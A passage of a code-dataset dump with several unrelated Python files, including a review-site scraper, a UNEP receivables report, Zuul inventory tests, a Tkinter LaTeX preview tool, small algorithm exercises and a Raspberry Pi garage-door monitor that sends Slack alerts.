self.should_skip_category(category):\n return\n yield category\n\n product_xpaths = { \n \n \n \"ProductName\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\",\n \n \n \"OriginalCategoryName\":\"//div[@id='breadcrumb_area']/a/text()\",\n \n \n \"PicURL\":\"(//div[@class='picture_container']/img/@src)[1]\",\n \n \n }\n product = self.init_item_by_xpaths(response, \"product\", product_xpaths)\n product['TestUrl'] = original_url\n picurl = product.get(\"PicURL\", \"\")\n if picurl and picurl[:2] == \"//\":\n product[\"PicURL\"] = \"https:\" + product[\"PicURL\"]\n if picurl and picurl[:1] == \"/\":\n product[\"PicURL\"] = get_full_url(original_url, picurl)\n manuf = product.get(\"ProductManufacturer\", \"\")\n if manuf == \"\" and \"\"[:2] != \"//\":\n product[\"ProductManufacturer\"] = \"\"\n try:\n product[\"OriginalCategoryName\"] = category['category_path']\n except:\n pass\n ocn = product.get(\"OriginalCategoryName\", \"\")\n if ocn == \"\" and \"//div[@id='breadcrumb_area']/a/text()\"[:2] != \"//\":\n product[\"OriginalCategoryName\"] = \"//div[@id='breadcrumb_area']/a/text()\"\n review_xpaths = { \n \"ProductName\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\",\n \"TestDateText\":\"//p[contains(.,'Testad') and contains(.,'av')]/text()\",\n \"TestPros\":\"//*[contains(text(),'Plus') or contains(text(),'Mycket')]/../text()[normalize-space()]\",\n \"TestCons\":\"//*[contains(text(),'Minus') or contains(text(),'Mindre')]/../text()[normalize-space()]\",\n \"TestTitle\":\"(//div[@id='breadcrumb_area']/following-sibling::h1)[1]/text()\", \n }\n summary = self.extract_xpath(response, \"//div[@class='tabcontent']//p[text()][1]/text()\")\n verdict = self.extract_all_xpath(response, \n \"//*[contains(text(),'Slutsats') or contains(text(),'Sammanfattning')]/../text()[normalize-space()]\",\n separator=\"\\n\")\n match1 = re.search('Slutsats\\n+([^\\n]+)', verdict)\n match2 = re.search('Sammanfattning\\n+([^\\n]+)', verdict)\n if match1:\n verdict = match1.group(1)\n elif match2:\n verdict = match2.group(1)\n \n\n review = self.init_item_by_xpaths(response, \"review\", review_xpaths)\n review['TestUrl'] = original_url\n review['TestSummary'] = summary\n review['TestVerdict'] = verdict\n\n try:\n review['ProductName'] = product['ProductName']\n review['source_internal_id'] = product['source_internal_id']\n except:\n pass\n awpic_link = review.get(\"AwardPic\", \"\")\n if awpic_link and awpic_link[:2] == \"//\":\n review[\"AwardPic\"] = \"https:\" + review[\"AwardPic\"]\n if awpic_link and awpic_link[:1] == \"/\":\n review[\"AwardPic\"] = get_full_url(original_url, awpic_link)\n\n matches = None\n field_value = review.get(\"TestDateText\", \"\")\n if field_value:\n matches = re.search(\"(\\d{4}-\\d{2}-\\d{2})\", field_value, re.IGNORECASE)\n if matches:\n review[\"TestDateText\"] = matches.group(1)\n \n\n review[\"DBaseCategoryName\"] = \"PRO\"\n \n\n yield product\n\n\n \n \n yield review\n \n","sub_path":"alascrapy/spiders/cyberphoto_se.py","file_name":"cyberphoto_se.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"23010831","text":"from Report import Report\n\nclass PPGReceivablesReportFactory(object):\n\n def __init__(self, projectdatabase, **kw):\n self.projectdatabase = projectdatabase\n self.params = kw\n\n def getReport(self):\n # create and fill the report\n report = Report('PPG Recievables Report')\n report.setReportHeaders((\n 'PPG Recievables Report',\n ),)\n report.setTableHeaders(((\n 'IMIS No.',\n 'Project Title',\n 'Executing Agency',\n 'GEF Grant',\n 'Total Disbursements',\n 'Total Expenditures',\n 'Receivable/(Payable)',\n ),))\n report.setTableRows(self.getReportData())\n # report.setTableTotals([])\n # report.setReportFooters()\n return report\n\n def getReportData(self):\n projects = self.params.get('projects', None)\n result = []\n for project in projects:\n ppg = project.fmi_folder.get('ppg', None)\n if ppg is not None:\n result.append((\n ppg.getIMISNumber(),\n project.project_general_info.Title(),\n project.project_general_info.getLeadExecutingAgencyNames(),\n ppg.getCommittedGEFGrant(),\n ppg.getSumCashDisbursements(),\n ppg.getSumYearlyExpenditures(),\n ppg.getAmountReceivable(),\n ))\n return result\n","sub_path":"unep.project-database/trunk/reports/PPGReceivablesReport.py","file_name":"PPGReceivablesReport.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"428424840","text":"# Copyright 2017 Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport base64\nimport os\n\nimport yaml\n\nfrom tests.base import AnsibleZuulTestCase\nfrom tests.base import ZuulTestCase\n\n\nclass TestInventoryBase(ZuulTestCase):\n\n tenant_config_file = 'config/inventory/main.yaml'\n\n def setUp(self, python_path=None):\n super(TestInventoryBase, self).setUp()\n if python_path:\n self.fake_nodepool.python_path = python_path\n self.executor_server.hold_jobs_in_build = True\n A = self.fake_gerrit.addFakeChange('org/project', 'master', 'A')\n self.fake_gerrit.addEvent(A.getPatchsetCreatedEvent(1))\n self.waitUntilSettled()\n\n def _get_build_inventory(self, name):\n build = self.getBuildByName(name)\n inv_path = os.path.join(build.jobdir.root, 'ansible', 'inventory.yaml')\n return yaml.safe_load(open(inv_path, 'r'))\n\n def _get_setup_inventory(self, name):\n build = self.getBuildByName(name)\n setup_inv_path = os.path.join(build.jobdir.root, 'ansible',\n 'setup-inventory.yaml')\n return yaml.safe_load(open(setup_inv_path, 'r'))\n\n\nclass TestInventoryPythonPath(TestInventoryBase):\n\n def setUp(self):\n super(TestInventoryPythonPath, self).setUp(python_path='fake-python')\n\n def test_single_inventory(self):\n inventory = self._get_build_inventory('single-inventory')\n\n all_nodes = ('ubuntu-xenial',)\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n node_vars = inventory['all']['hosts'][node_name]\n self.assertEqual(\n 'fake-python', node_vars['ansible_python_interpreter'])\n\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory')\n self.assertEqual(z_vars['message'], 'QQ==')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n\nclass TestInventory(TestInventoryBase):\n\n def test_single_inventory(self):\n\n inventory = self._get_build_inventory('single-inventory')\n\n all_nodes = ('ubuntu-xenial',)\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n node_vars = inventory['all']['hosts'][node_name]\n self.assertEqual(\n '/usr/bin/python2', node_vars['ansible_python_interpreter'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory')\n self.assertEqual(z_vars['message'], 'QQ==')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_single_inventory_list(self):\n\n inventory = self._get_build_inventory('single-inventory-list')\n\n all_nodes = ('compute', 'controller')\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'single-inventory-list')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_group_inventory(self):\n\n inventory = self._get_build_inventory('group-inventory')\n\n all_nodes = ('controller', 'compute1', 'compute2')\n self.assertIn('all', inventory)\n self.assertIn('children', inventory['all'])\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for group_name in ('ceph-osd', 'ceph-monitor'):\n self.assertIn(group_name, inventory['all']['children'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n self.assertIn(node_name,\n inventory['all']['children']\n ['ceph-monitor']['hosts'])\n self.assertIn('zuul', inventory['all']['vars'])\n z_vars = inventory['all']['vars']['zuul']\n self.assertIn('executor', z_vars)\n self.assertIn('src_root', z_vars['executor'])\n self.assertIn('job', z_vars)\n self.assertEqual(z_vars['job'], 'group-inventory')\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_hostvars_inventory(self):\n\n inventory = self._get_build_inventory('hostvars-inventory')\n\n all_nodes = ('default', 'fakeuser')\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n self.assertIn('vars', inventory['all'])\n for node_name in all_nodes:\n self.assertIn(node_name, inventory['all']['hosts'])\n # check if the nodes use the correct username\n if node_name == 'fakeuser':\n username = 'fakeuser'\n else:\n username = 'zuul'\n self.assertEqual(\n inventory['all']['hosts'][node_name]['ansible_user'], username)\n\n # check if the nodes use the correct or no ansible_connection\n if node_name == 'windows':\n self.assertEqual(\n inventory['all']['hosts'][node_name]['ansible_connection'],\n 'winrm')\n else:\n self.assertEqual(\n 'local',\n inventory['all']['hosts'][node_name]['ansible_connection'])\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n def test_setup_inventory(self):\n\n setup_inventory = self._get_setup_inventory('hostvars-inventory')\n inventory = self._get_build_inventory('hostvars-inventory')\n\n self.assertIn('all', inventory)\n self.assertIn('hosts', inventory['all'])\n\n self.assertIn('default', setup_inventory['all']['hosts'])\n self.assertIn('fakeuser', setup_inventory['all']['hosts'])\n self.assertIn('windows', setup_inventory['all']['hosts'])\n self.assertNotIn('network', setup_inventory['all']['hosts'])\n self.assertIn('default', inventory['all']['hosts'])\n self.assertIn('fakeuser', inventory['all']['hosts'])\n self.assertIn('windows', inventory['all']['hosts'])\n self.assertIn('network', inventory['all']['hosts'])\n\n self.executor_server.release()\n self.waitUntilSettled()\n\n\nclass TestAnsibleInventory(AnsibleZuulTestCase):\n\n tenant_config_file = 'config/inventory/main.yaml'\n\n def _get_file(self, build, path):\n p = os.path.join(build.jobdir.root, path)\n with open(p) as f:\n return f.read()\n\n def _jinja2_message(self, expected_message):\n\n # This test runs a bit long and needs extra time.\n self.wait_timeout = 120\n # Keep the jobdir around to check inventory\n self.executor_server.keep_jobdir = True\n # Output extra ansible info so we might see errors.\n self.executor_server.verbose = True\n A = self.fake_gerrit.addFakeChange(\n 'org/project2', 'master', expected_message)\n self.fake_gerrit.addEvent(A.getPatchsetCreatedEvent(1))\n self.waitUntilSettled()\n self.assertHistory([\n dict(name='jinja2-message', result='SUCCESS', changes='1,1')])\n\n build = self.history[0]\n inv_path = os.path.join(build.jobdir.root, 'ansible', 'inventory.yaml')\n inventory = yaml.safe_load(open(inv_path, 'r'))\n\n decoded_message = base64.b64decode(\n inventory['all']['vars']['zuul']['message']).decode('utf-8')\n self.assertEqual(decoded_message, expected_message)\n\n obtained_message = self._get_file(self.history[0],\n 'work/logs/commit-message.txt')\n\n self.assertEqual(obtained_message, expected_message)\n\n def test_jinja2_message_brackets(self):\n self._jinja2_message(\"This message has {{ jinja2 }} in it \")\n\n def test_jinja2_message_raw(self):\n self._jinja2_message(\"This message has {% raw %} in {% endraw %} it \")\n\n\nclass TestWindowsInventory(TestInventoryBase):\n config_file = 'zuul-winrm.conf'\n\n def test_windows_inventory(self):\n\n inventory = self._get_build_inventory('hostvars-inventory')\n windows_host = inventory['all']['hosts']['windows']\n self.assertEqual(windows_host['ansible_connection'], 'winrm')\n self.assertEqual(\n windows_host['ansible_winrm_operation_timeout_sec'],\n '120')\n self.assertEqual(\n windows_host['ansible_winrm_read_timeout_sec'],\n '180')\n\n self.executor_server.release()\n self.waitUntilSettled()\n","sub_path":"tests/unit/test_inventory.py","file_name":"test_inventory.py","file_ext":"py","file_size_in_byte":9985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"172726745","text":"\n\"\"\" https://stackoverflow.com/questions/36636185/is-it-possible-for-python-to-display-latex-in-real-time-in-a-text-box \"\"\"\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nmatplotlib.use('TkAgg')\n\nfrom Tkinter import *\nfrom ttk import *\n\ndef graph(text):\n tmptext = entry.get()\n if tmptext == \"\":\n tmptext = \"waiting\\bfor\\binput\"\n tmptext = \"$\"+tmptext+\"$\"\n\n ax.clear()\n ax.text(0.2, 0.6, tmptext, fontsize = 20) \n canvas.draw()\n\n\nroot = Tk()\n\nmainframe = Frame(root)\nmainframe.pack()\n\ntext = StringVar()\nentry = Entry(mainframe, width=100, textvariable=text)\nentry.pack()\n\nlabel = Label(mainframe)\nlabel.pack()\n\nfig = matplotlib.figure.Figure(figsize=(4, 2), dpi=200)\nax = fig.add_subplot(111)\n\ncanvas = FigureCanvasTkAgg(fig, master=label)\ncanvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1)\ncanvas._tkcanvas.pack(side=TOP, fill=BOTH, expand=1)\n\nax.get_xaxis().set_visible(False)\nax.get_yaxis().set_visible(False)\n\n\n#Greek\ndef alpha(): \n entry.insert('insert', 'α')\ndef Beta(): \n entry.insert('insert', 'β')\ndef Gamma(): \n entry.insert('insert', 'γ')\ndef Delta(): \n entry.insert('insert', 'δ')\ndef Epsilon(): \n entry.insert('insert', 'ε')\ndef Theta(): \n entry.insert('insert', 'θ')\ndef Kappa(): \n entry.insert('insert', 'κ')\ndef Lambda(): \n entry.insert('insert', 'λ')\ndef Mu(): \n entry.insert('insert', 'μ')\ndef Xi(): \n entry.insert('insert', 'ξ')\ndef Pi(): \n entry.insert('insert', 'π')\ndef Rho(): \n entry.insert('insert', 'ρ')\ndef Sigma(): \n entry.insert('insert', 'σ')\ndef Tau(): \n entry.insert('insert', 'τ')\ndef Phi(): \n entry.insert('insert', 'φ')\ndef Chi(): \n entry.insert('insert', 'χ')\ndef Psi(): \n entry.insert('insert', 'ψ')\ndef Omega(): \n entry.insert('insert', 'ω')\n\nwid=30\nhei=30\n# Greek\nbtn_alpha = Button(root,text = 'α',command = alpha)\nbtn_alpha.place(x = 0,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'β',command = Beta)\nbtn_alpha.place(x = 0+wid*1,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'γ',command = Gamma)\nbtn_alpha.place(x = 0+wid*2,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'δ',command = Delta)\nbtn_alpha.place(x = 0+wid*3,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ε',command = Epsilon)\nbtn_alpha.place(x = 0+wid*4,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'θ',command = Theta)\nbtn_alpha.place(x = 0+wid*5,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'κ',command = Kappa)\nbtn_alpha.place(x = 0+wid*6,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'λ',command = Lambda)\nbtn_alpha.place(x = 0+wid*7,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'μ',command = Mu)\nbtn_alpha.place(x = 0+wid*8,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ξ',command = Xi)\nbtn_alpha.place(x = 0+wid*0,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'π',command = Pi)\nbtn_alpha.place(x = 0+wid*1,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ρ',command = Rho)\nbtn_alpha.place(x = 0+wid*2,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'σ',command = Sigma)\nbtn_alpha.place(x = 0+wid*3,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'τ',command = Tau)\nbtn_alpha.place(x = 0+wid*4,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'φ',command = Phi)\nbtn_alpha.place(x = 0+wid*5,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'χ',command = Chi)\nbtn_alpha.place(x = 0+wid*6,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ψ',command = Psi)\nbtn_alpha.place(x = 0+wid*7,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ω',command = Omega)\nbtn_alpha.place(x = 0+wid*8,y = 350+hei*1,width = wid,height = hei)\n\n\n\n\n# function\ndef xa(): \n entry.insert('insert', '^{U}')\ndef xab(): \n entry.insert('insert', '_{L}^{U}')\ndef ppx(): \n entry.insert('insert', ' \\frac{\\partial ?}{\\partial x}')\ndef p2px2(): \n entry.insert('insert', ' \\frac{\\partial^2 ?}{\\partial x^2}')\ndef ddx(): \n entry.insert('insert', ' \\frac{\\mathrm{d} ?}{\\mathrm{d} x}')\ndef inte(): \n entry.insert('insert', '\\int ?')\ndef inteab(): \n entry.insert('insert', '\\int_{L}^{U}')\n\nbtn_xa = Button(root,text = 'x^(a)',command = xa)\nbtn_xa.place(x = 0+wid*10,y = 350,width = wid,height = hei)\nbtn_xab = Button(root,text = 'x_(a)^(b)',command = xab)\nbtn_xab.place(x = 0+wid*11,y = 350,width = wid*2,height = hei)\nbtn_ppx = Button(root,text = 'p/px',command = ppx)\nbtn_ppx.place(x = 0+wid*13,y = 350,width = wid*2,height = hei)\nbtn_ddx = Button(root,text = 'd/dx',command = ddx)\nbtn_ddx.place(x = 0+wid*15,y = 350,width = wid,height = hei)\nbtn_inte = Button(root,text = 'integral',command = inte)\nbtn_inte.place(x = 0+wid*16,y = 350,width = wid*2,height = hei)\nbtn_inteab = Button(root,text = 'integralab',command = inteab)\nbtn_inteab.place(x = 0+wid*10,y = 350+hei,width = wid*2,height = hei)\n\n\n\n\n\n\n\n\n\n\n\n\nroot.bind('', graph)\nroot.mainloop()","sub_path":"latexmath/latex_mat_v2.py","file_name":"latex_mat_v2.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456568898","text":"'''\nN : 자연수\nK : 나눌 수 있는 수\n1. N에서 1을 뺀다.\n2. N을 K로 나눈다.\n\n이 두 가지 연산을 골라서 최소한만 연산해서 1로 만드는 것이 과제\n'''\n\nM, K = map(int, input().split())\nfirst = M % K\nsecond = (M - first) // K\n\nresult = first + second\nprint(result)\n","sub_path":"이것이 취업을 위한 코딩테스트다 with 파이썬/1. 그리디 알고리즘/[099p - 2회독]1이 될 때까지 - 그리디.py","file_name":"[099p - 2회독]1이 될 때까지 - 그리디.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"618200473","text":"from tornado.web import Application\nfrom tornado.options import options, define\nfrom kazoo.client import KazooClient\n\ndefine('port', default=8080, help=\"listen port.\")\ndefine('bind', default='0.0.0.0', help=\"bind address\")\ndefine('zkroot', default='/cmdb/lock', help=\"zookeeper node of cmdb root.\")\ndefine('zkHosts', default='127.0.0.1:2181', help='zookeeper server.')\n\n\ndef make_app(router, **settings):\n app = Application(router, settings)\n zk = KazooClient(options.zkHosts)\n setattr(app, 'zk', zk)\n return app\n","sub_path":"cmdb/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"443780390","text":"from functools import reduce\nN = input() #join함수 써보기, 30은 3의 배수에 마지막자리의 숫자가 0이면 됨, 3의 배수는 자리수 �� 더해서 3의 배수, 3의 배수는 자릿수 다 합쳐서 3의 배수면 됨\nL = list(str(N)) # 999을 입력 받으면 ['9','9','9']로 쪼개줌\na = 10**(len(L)-1)\nL = sorted(L,reverse=True) #가장 큰 수니까 내림차순으로 정렬해줌\ns = reduce(lambda x,y : int(x)+int(y),L) #리스트 안의 요소를 모두 더해서 값 한개로\n\nif L[-1] != \"0\" or s%3!=0 :\n print(-1)\nelse :\n print(int(\"\".join(L))) #리스트 안의 요소를 합치는 함수, 하고나서 형변환 해줌\n\n\n \n\n\n\n\n# N = input() #join 함수 안쓰고 int로 해결함\n# L = list(map(int,str(N)))\n# l = len(L)\n# a = 10**(l-1)\n# L = sorted(L,reverse=True)\n# if L[-1] != 0 :\n# print(-1)\n# else :\n# result = 0\n# for i in range(l):\n# result += L[i]*a\n# a//=10\n# print(result)\n \n\n\n\n\n\n\n# import itertools #메모리초과 뜸\n# N = input()\n# L = list(map(int,str(N)))\n# a = 10**(len(L)-1)\n# P = list(itertools.permutations(L))\n# result = -1\n\n# for i in range(len(P)):\n# tmp = 0\n# b = a\n# for j in range(len(P[i])):\n# tmp += P[i][j]*(b)\n# b//=10\n# if tmp%30 == 0 :\n# result = max(result,tmp)\n# print(result)","sub_path":"2020_spring/2020_04_01/10610_JH.py","file_name":"10610_JH.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125301942","text":"#!/usr/bin/python\n\n#\n# This Python script is used to monitor the status of a garage door and\n# report open and close events to a smartphone via slack IOT events.\n#\n# A Raspberry Pi model 3 or 3+ and a HC-SR05 ultrasonic distance sensor and a\n# handful of parts are required.\n#\n# Enhanced to send HTTP POST requests with the current garage door status to a\n# Particle Photon. The Photon will allow a person (via an app) to close the\n# garage door remotely. The Photon requires the current status of the garage\n# door so it can prevent a person from opening the door.\n\n# Import required standard libraries.\nfrom __future__ import print_function\nimport argparse\nimport math\nimport os\nimport requests\nimport RPi.GPIO as GPIO\nimport time\n\n# Import required libraries.\nimport gd_closer_credentials\nimport journal\nimport sensor\nimport slack\n\n# Define the Raspberry Pi GPIO pins for the sensor and LED.\nGPIO_TRIGGER = 25\nGPIO_ECHO = 24\nGPIO_STATUS_LED = 21\n\n# Define the loggers and log files that will be used to\n# record activitiesand when the program has started. A separate\n# log is usedto make it easy to see how often the program is\n# restarteddue to fatal errors.\nGDOOR_ACTIVITY_LOGGER = \"activity\"\nGDOOR_STARTUP_LOGGER = \"startup\"\nGDOOR_ACTIVITY_LOG_FILE = \"gdoor-activity.log\"\nGDOOR_STARTUP_LOG_FILE = \"gdoor-startup.log\"\n\n# Define the door states.\nDOOR_OPEN = \"open\"\nDOOR_CLOSED = \"closed\"\n\n# Define the messages that will be sent via Slack.\nDOOR_OPENED_MESSAGE = \"Garage door just opened!\"\nDOOR_CLOSED_MESSAGE = \"Garage door just closed!\"\nDOOR_OPEN_WARNING_MESSAGE = \"Garage door has been open more than {} minutes\"\n\n# If SLACK_DEBUG is set to True messages will not be sent to slack.\nSLACK_DEBUG = False\n\n# Slack message successfully sent\nSLACK_SUCCESS = 200\n\n# Garage door closing device status update commands\nGD_CLOSER_CLOSED = \"setgdclosed\"\nGD_CLOSER_OPEN = \"setgdopen\"\n\n\ndef post_gdoor_status(status):\n \"\"\"\n Send a HTTPS POST to a Particle Photon microcontroller attached to the Particle Cloud.\n The Photon keeps track of the garage door status and via an app will allow a person to\n close the garage door. The Photon will only allow the garage door to be closed (not opened)\n and to enforce that requires up-to-date status of whether the garage door is currently open\n or closed. A string with the status of the POST request is returned from this function.\n \"\"\"\n\n GD_CLOSER_SOURCE = \"gdmonitor\" # used to indicate where the POST command came from\n\n # Define the parameters that will be sent in the POST request\n headers = { 'Authorization' : 'Bearer ' + gd_closer_credentials.GD_CLOSER_BEARER }\n data = { 'arg' : GD_CLOSER_SOURCE }\n url = 'https://api.particle.io/v1/devices/' + gd_closer_credentials.GD_CLOSER_DEVICE + '/' + status\n\n # Attempt to send the POST request. Failure will not stop the monitor program.\n try:\n response = requests.post(url, headers=headers, data=data)\n return \"POST to gdcloser with status={} was successful\".format(status)\n except requests.exceptions.RequestException as err:\n return \"POST to gdcloser Request failed with error: {}\".format(err)\n except Exception as err:\n return \"POST to gdcloser failed with an unexpected error: {}\".format(err)\n \n\ndef get_average_measurement(distance_sensor,\n num_measurements,\n delay,\n door_log,\n ):\n \"\"\"\n Collect a set of measurements and return the average measurement.\n \"\"\"\n\n measurement = 0.0\n for n in range(num_measurements):\n\n distance_measurement, echo_counter = distance_sensor.get_measurement()\n measurement += distance_measurement\n\n logmsg = \"Measurement: {} Sensor measurement: {} Echo counter: {}\".format(n, distance_measurement, echo_counter)\n door_log.debug(logmsg)\n\n time.sleep(delay)\n\n average_measurement = measurement / num_measurements\n return average_measurement\n\n\ndef monitor_door(trigger_pin,\n echo_pin,\n led_status_pin,\n measurements,\n time_between_indiv_measurements,\n time_between_avg_measurements,\n open_threshold,\n warning_threshold,\n door_log,\n ):\n\n \"\"\"\n Use the sensor to monitor the status of the door and\n send slack messages when the door state changes. Also\n report via slack if the door is opened a prolonged period of time.\n \"\"\"\n\n # Record the start of execution.\n door_log.information(\"Door Monitoring Started\")\n\n # Setup for sending slack messages\n slack_iot = slack.Iot(debug=SLACK_DEBUG)\n\n # Initialize the utltrasonic distance sensor.\n distance_sensor = sensor.DistanceSensor(trigger_pin,\n echo_pin,\n led_status_pin,\n 0.05,\n DOOR_OPEN,\n DOOR_CLOSED,\n )\n\n # Keep track of the number of times measurements are taken\n iteration = -1\n\n # First time through assume door is closed.\n door_previous_status = DOOR_CLOSED\n door_status = DOOR_CLOSED\n last_warning = 0\n\n while True:\n\n iteration += 1\n\n door_log.debug(\"------- Entering iteration {:,} -------\".format(iteration))\n door_log.information(\"Checking door status ({:,})\".format(iteration))\n\n # Take the specified number of measurements and calculate the average.\n\n elapsed = get_average_measurement(distance_sensor,\n measurements,\n time_between_indiv_measurements,\n door_log,\n )\n\n door_log.debug(\"{:,} Average measurement: {}\".format(iteration, elapsed))\n\n # Calculate the distance in centimeters\n distance = distance_sensor.calculate_distance(elapsed)\n\n door_log.debug(\"{:,} Distance: {:5.1f} cm\".format(iteration, distance))\n\n # Determine what the current state of the door is by\n # comparing the distance to the number of centimeters above the\n # door is considered open\n\n if distance < open_threshold:\n door_status = DOOR_OPEN\n else:\n door_status = DOOR_CLOSED\n\n door_log.information(\"{:,} Door is currently {}\".format(iteration, door_status))\n\n # Check to see if the state of the door has changed.\n if door_status != door_previous_status:\n\n # The state of the door has changed.\n # Determine what happened.\n\n door_log.information(\"{:,} Door State Change: New Distance: {:5.1f}\".format(iteration, distance))\n\n if door_status == DOOR_OPEN:\n\n # Log that the door has opened; set the LED to\n # indicate that the door is open; send a message\n # via slack saying the door is open.\n\n door_previous_status = DOOR_OPEN\n door_log.information(DOOR_OPENED_MESSAGE)\n distance_sensor.set_door_status_led(DOOR_OPEN)\n # Don't send a slack message the first time through\n if iteration > 0:\n slack_iot.post_message(DOOR_OPENED_MESSAGE)\n if slack_iot.status_code != SLACK_SUCCESS:\n door_log.information(\"Unable to send slack garage door Opened notification\")\n\n # Record the time that door was opened.\n opened_time = time.time()\n\n # Send HTTPS POST with current status to the garage door closer device.\n door_log.information(post_gdoor_status(GD_CLOSER_OPEN))\n\n else:\n # Log that the door has closed; set the LED to\n # indicate that the door is closed; send a message\n # via slack saying the door is closed.\n\n door_previous_status = DOOR_CLOSED\n door_log.information(DOOR_CLOSED_MESSAGE)\n distance_sensor.set_door_status_led(DOOR_CLOSED)\n \n # Don't send a slack message the first time through\n if iteration > 0:\n slack_iot.post_message(DOOR_CLOSED_MESSAGE)\n if slack_iot.status_code != SLACK_SUCCESS:\n door_log.information(\"Unable to send slack garage door Closed notification\")\n \n # Send HTTPS POST with current status to the garage door closer device.\n door_log.information(post_gdoor_status(GD_CLOSER_CLOSED))\n\n # If the door is closed, blink the LED briefly. This blinking\n # is like what happens on smoke detectors and is done to indicate\n # that the sensor and Raspberry Pi are alive and well.\n if door_status == DOOR_CLOSED:\n distance_sensor.blink_led()\n\n # If the door is open, calculate how long it's been open, and periodically\n # send slack messages warning that the door has been opened for a prolonged\n # period of time.\n\n if door_status == DOOR_OPEN:\n elapsed_open_time_mins = (time.time() - opened_time) / 60.0\n door_log.information(\"{:,} Open door elapsed time is {:06.2f} minutes\".format(iteration, elapsed_open_time_mins))\n elapsed_open_time_mins = int(elapsed_open_time_mins)\n #### print(\"elapsed_open_time_mins {} last_warning {}\".format(elapsed_open_time_mins, last_warning))\n\n # Send the lack message if the door has been opened for a multiple of\n # 'warning_threshold' minutes.\n\n if ((elapsed_open_time_mins > 0 ) and\n (elapsed_open_time_mins % warning_threshold) == 0):\n #### print(\"elapsed_open_time {} warning_threshold {}\".format(elapsed_open_time_mins, warning_threshold))\n\n # Make sure only one message is sent per 'warning_threshold' multiple.\n if elapsed_open_time_mins != last_warning:\n open_warning_message = DOOR_OPEN_WARNING_MESSAGE.format(elapsed_open_time_mins)\n door_log.warning(open_warning_message)\n slack_iot.post_message(open_warning_message)\n last_warning = elapsed_open_time_mins\n\n # Sleep until time to take the next set of measurements.\n door_log.debug(\"{:,} Sleeping for {} seconds\".format(iteration, time_between_avg_measurements))\n time.sleep(time_between_avg_measurements)\n door_log.debug(\"{:,} Awoken from 